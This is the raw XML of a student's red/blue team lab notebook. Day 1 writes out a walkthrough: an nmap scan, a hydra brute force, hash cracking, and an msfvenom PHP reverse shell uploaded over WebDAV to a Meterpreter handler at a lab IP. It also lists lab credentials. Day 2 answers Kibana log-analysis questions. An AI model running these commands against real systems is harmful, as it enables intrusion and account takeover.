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3D12C" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>Project 2 Red/Blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C5A67" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="6364FDF4" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>Take lots of notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F5FFE" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>Document steps and methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC271C2" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="5192FB30" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>https://labs.azure.com/register/wnyc2fqc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBB46DE" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t xml:space="preserve">Username/password to get into Remote Desktop Connection: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>azadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/p4ssw0rd*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419A71BD" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="5D0A3740" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t xml:space="preserve">1. Attack VM Kali root/p: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BF6790D" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>2. Capstone target machine *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fwds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> logs to ELK (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metricbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EC9A7" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>3. ELK VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DAF518" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="5BF962FF" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t xml:space="preserve">Day1: Find the Capstone VM flag **Look </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Overview in ppt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957C335" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>Day2: Answer all provided questions about the logs captured in Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E87152" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:t>Day3: Complete a presentation summarizing your findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4FF896" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="7D0042E4" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="0E133212" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="35ABF7D6" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="088E0A1B" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="770A63B7" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="76AA3313" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="2B854FCB" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="6D486D79" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="2C2CB802" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="5A31D87F" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="7AAD109D" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="687003D7" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="1EBA89FD" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="11749F27" w14:textId="2C5046D8" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Day 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A6100" w14:textId="77777777" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E11D5E" w14:textId="450E94BA" w:rsidR="007F3DA0" w:rsidRDefault="00526E40" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5014E722" wp14:editId="4CF3EE6C">
            <wp:extent cx="4981575" cy="1847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8833" w14:textId="6DB1E431" w:rsidR="00526E40" w:rsidRDefault="00526E40" w:rsidP="00526E40"/>
    <w:p w14:paraId="10AFC1AB" w14:textId="07902074" w:rsidR="00526E40" w:rsidRDefault="00571195" w:rsidP="00526E40">
      <w:r>
        <w:t>Went to 192.168.1.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F39BC10" w14:textId="008DDC91" w:rsidR="00571195" w:rsidRDefault="00571195" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21C54108" wp14:editId="275C978A">
            <wp:extent cx="4638675" cy="523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665D" w14:textId="36871B8B" w:rsidR="00963FF9" w:rsidRDefault="00963FF9" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5913BA2D" wp14:editId="5DEC67AE">
            <wp:extent cx="5943600" cy="897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7910" w14:textId="1F77E295" w:rsidR="00651672" w:rsidRDefault="00651672" w:rsidP="00526E40">
      <w:r>
        <w:t>Navigated to 192.168.1.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>company_folders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553C3D2D" w14:textId="0809AC5D" w:rsidR="00651672" w:rsidRDefault="00651672" w:rsidP="00526E40">
      <w:r>
        <w:t xml:space="preserve">Ran hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ashton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/share/wordlists/rockyou.txt -s 80 -f -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.105 http-get /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>company_folders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762618D0" w14:textId="521BD34E" w:rsidR="00651672" w:rsidRDefault="00D832F4" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="108634A0" wp14:editId="40B24269">
            <wp:extent cx="5943600" cy="874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0089" w14:textId="77777777" w:rsidR="00D32158" w:rsidRDefault="00D832F4" w:rsidP="00526E40">
      <w:r>
        <w:t>Found Ashton’s note to himself:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F8535D" w14:textId="10784433" w:rsidR="00D832F4" w:rsidRDefault="00D32158" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D832F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47409D2B" wp14:editId="62FA67D7">
            <wp:extent cx="5943600" cy="1121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DFB5" w14:textId="7B184141" w:rsidR="00651672" w:rsidRDefault="00D832F4" w:rsidP="00526E40">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Crack Ryan’s hash using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00464DEB">
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE343D">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C5C9D" w14:textId="22BB7547" w:rsidR="00464DEB" w:rsidRDefault="00464DEB" w:rsidP="00526E40">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01A1AFE7" w14:textId="3E933B2C" w:rsidR="00EE343D" w:rsidRDefault="00464DEB" w:rsidP="00526E40">
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="006E77F4">
        <w:t>inux4u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3151EF5C" w14:textId="2B61F247" w:rsidR="00464DEB" w:rsidRDefault="00464DEB" w:rsidP="00526E40">
      <w:r>
        <w:t xml:space="preserve">used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to login via 192.168.1.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA83FF" w14:textId="62D77EA7" w:rsidR="00464DEB" w:rsidRDefault="00464DEB" w:rsidP="00526E40">
      <w:r>
        <w:t xml:space="preserve">found this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7844EEB8" wp14:editId="07870BAC">
            <wp:extent cx="289560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BD37" w14:textId="37C856B6" w:rsidR="00464DEB" w:rsidRDefault="00464DEB" w:rsidP="00526E40">
      <w:r>
        <w:t>hash analyzer can’t recognize this hash…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB3550B" w14:textId="696A87D2" w:rsidR="00464DEB" w:rsidRDefault="008A04ED" w:rsidP="00526E40">
      <w:r>
        <w:t>=md4gen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E96D77" w14:textId="34193078" w:rsidR="00D32158" w:rsidRDefault="00D32158" w:rsidP="00526E40"/>
    <w:p w14:paraId="4A3FA2B3" w14:textId="77777777" w:rsidR="00A71ADB" w:rsidRDefault="00D32158" w:rsidP="00A71ADB">
      <w:r>
        <w:t>PHP reverse shell payload</w:t>
      </w:r>
      <w:r w:rsidR="00A71ADB" w:rsidRPr="00A71ADB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD3C07F" w14:textId="62003B09" w:rsidR="00A71ADB" w:rsidRDefault="00A71ADB" w:rsidP="00A71ADB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p php/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="00604228">
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=-4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r w:rsidR="00604228">
        <w:t>ryan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="456534F3" w14:textId="558C71A5" w:rsidR="00D32158" w:rsidRDefault="00D32158" w:rsidP="00526E40"/>
    <w:p w14:paraId="33BAA6E2" w14:textId="617EA629" w:rsidR="00D32158" w:rsidRDefault="00D32158" w:rsidP="00526E40">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A0F9146" w14:textId="4675584C" w:rsidR="00D32158" w:rsidRDefault="00A71ADB" w:rsidP="00526E40">
      <w:r>
        <w:t>Use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9353A" w14:textId="495750B9" w:rsidR="00A71ADB" w:rsidRDefault="00A71ADB" w:rsidP="00526E40">
      <w:r>
        <w:t>Set payload php/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</w:p>
    <w:p w14:paraId="35C0A572" w14:textId="4C0E642D" w:rsidR="00A71ADB" w:rsidRDefault="00A71ADB" w:rsidP="00526E40">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="00604228">
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F3A06F" w14:textId="77777777" w:rsidR="008574D8" w:rsidRDefault="008574D8" w:rsidP="00526E40"/>
    <w:p w14:paraId="76E9000A" w14:textId="63B3733F" w:rsidR="00604228" w:rsidRDefault="00604228" w:rsidP="00526E40"/>
    <w:p w14:paraId="76591C36" w14:textId="4BEDBA6B" w:rsidR="00604228" w:rsidRDefault="00604228" w:rsidP="00526E40">
      <w:r>
        <w:t xml:space="preserve">Moved shell/php to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A157FF2" w14:textId="2719A068" w:rsidR="00604228" w:rsidRDefault="00604228" w:rsidP="00526E40">
      <w:r>
        <w:t>Nav to 192.168.1.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and logged in using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryan’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B7DA4" w14:textId="59E0218F" w:rsidR="00057675" w:rsidRDefault="00057675" w:rsidP="00526E40">
      <w:r>
        <w:t>Click on my ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B0F2EB" w14:textId="067459C6" w:rsidR="00604228" w:rsidRDefault="00604228" w:rsidP="00526E40"/>
    <w:p w14:paraId="38A4A6D8" w14:textId="3AE16D17" w:rsidR="00792490" w:rsidRDefault="00792490" w:rsidP="00526E40">
      <w:r>
        <w:t>Go back to Kali window(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell now up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCAFD4" w14:textId="3CD4AC9F" w:rsidR="00792490" w:rsidRDefault="00792490" w:rsidP="00526E40">
      <w:r>
        <w:t>cd /</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B4D58" w14:textId="45EF12E6" w:rsidR="00792490" w:rsidRDefault="00792490" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D0DDB4A" wp14:editId="67A24BF2">
            <wp:extent cx="2114550" cy="1000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D1CD" w14:textId="5F85B4AA" w:rsidR="00792490" w:rsidRDefault="00792490" w:rsidP="00526E40">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DAY 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2770C4F0" w14:textId="6382A713" w:rsidR="006C0509" w:rsidRDefault="006C0509" w:rsidP="00526E40">
      <w:r>
        <w:t>Creating dashboards in ELK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26507FFC" w14:textId="0C2F7111" w:rsidR="006C0509" w:rsidRDefault="006C0509" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02E80E6C" wp14:editId="595E27F3">
            <wp:extent cx="5943600" cy="31400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6036" w14:textId="7D78E84A" w:rsidR="006C0509" w:rsidRDefault="006C0509" w:rsidP="00526E40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76E27F7E" wp14:editId="0D316F71">
            <wp:extent cx="5943600" cy="330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69E0" w14:textId="670E8E1D" w:rsidR="00F10FBD" w:rsidRDefault="00F10FBD" w:rsidP="00526E40"/>
    <w:p w14:paraId="265C6B18" w14:textId="4E908616" w:rsidR="00F10FBD" w:rsidRDefault="00F10FBD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify the offensive traffic between my machine and the web machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A3FAB" w14:textId="65C23EDA" w:rsidR="00F10FBD" w:rsidRDefault="00F10FBD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When did the interaction occur? June 13 3pm to 6pm, time is off on the VM*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C643C41" w14:textId="266AC132" w:rsidR="00F10FBD" w:rsidRDefault="00F10FBD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>What responses did the victim send back?</w:t>
      </w:r>
      <w:r w:rsidR="00F82560">
        <w:t xml:space="preserve"> Mostly </w:t>
      </w:r>
      <w:r w:rsidR="0085386E">
        <w:t xml:space="preserve">status 207 regarding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0085386E">
        <w:t>Webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0085386E">
        <w:t>, a couple 401 for una</w:t>
      </w:r>
      <w:r w:rsidR="00E70009">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="0085386E">
        <w:t>thorized in regards to authentication, a 200 meaning I was able to authenticate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882650B" w14:textId="414D8EF7" w:rsidR="00E70009" w:rsidRDefault="00E70009" w:rsidP="00E70009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57726D33" wp14:editId="491CE49A">
            <wp:extent cx="5943600" cy="3482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D0D2" w14:textId="3FFE7C9D" w:rsidR="00F10FBD" w:rsidRDefault="00F10FBD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What data is concerning from the Blue Team perspective? 10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> requests</w:t>
      </w:r>
      <w:r w:rsidR="00E70009">
        <w:t>, large spikes in any of the data indicate something unusual is going on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF5DAA" w14:textId="722E6185" w:rsidR="005B4D64" w:rsidRDefault="005B4D64" w:rsidP="00F10FB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8601CC1" wp14:editId="1E93A7E3">
            <wp:extent cx="5943600" cy="6079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1C73" w14:textId="77777777" w:rsidR="00F10FBD" w:rsidRDefault="00F10FBD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157E7000" w14:textId="02D23886" w:rsidR="00F10FBD" w:rsidRDefault="00F10FBD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the request for the Hidden Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D09B0C" w14:textId="77777777" w:rsidR="005B4D64" w:rsidRDefault="00F82560" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How many requests were made to this directory? At what time and from which IP Address?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47859439" w14:textId="5F725CC6" w:rsidR="005B4D64" w:rsidRDefault="005B4D64" w:rsidP="005B4D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00E70009">
        <w:t xml:space="preserve"> on Jun 16, 4pm **my time is off because I had my VM reset after completing Day so I had to go back and redo parts of Day 1 in order to show the data in ELK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065C173" w14:textId="3DD8F6EC" w:rsidR="005B4D64" w:rsidRDefault="005B4D64" w:rsidP="005B4D6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E5A3DB7" wp14:editId="1BA8F743">
            <wp:extent cx="5943600" cy="3243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A909" w14:textId="77777777" w:rsidR="005B4D64" w:rsidRDefault="005B4D64" w:rsidP="005B4D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777F4C69" w14:textId="329A237B" w:rsidR="00FB44CF" w:rsidRDefault="001E1FDD" w:rsidP="005B4D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Which files were requested? What information did they contain?</w:t>
      </w:r>
      <w:r w:rsidR="005B4D64">
        <w:t xml:space="preserve"> GET requests it contained info that told me how to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B4D64">
        <w:t>WebDav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B4D64">
        <w:t xml:space="preserve"> into their server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AB2AEA" w14:textId="7E3A5274" w:rsidR="0085386E" w:rsidRDefault="00FB44CF" w:rsidP="00FB44CF">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB44CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB44CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>company_folders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB44CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB44CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
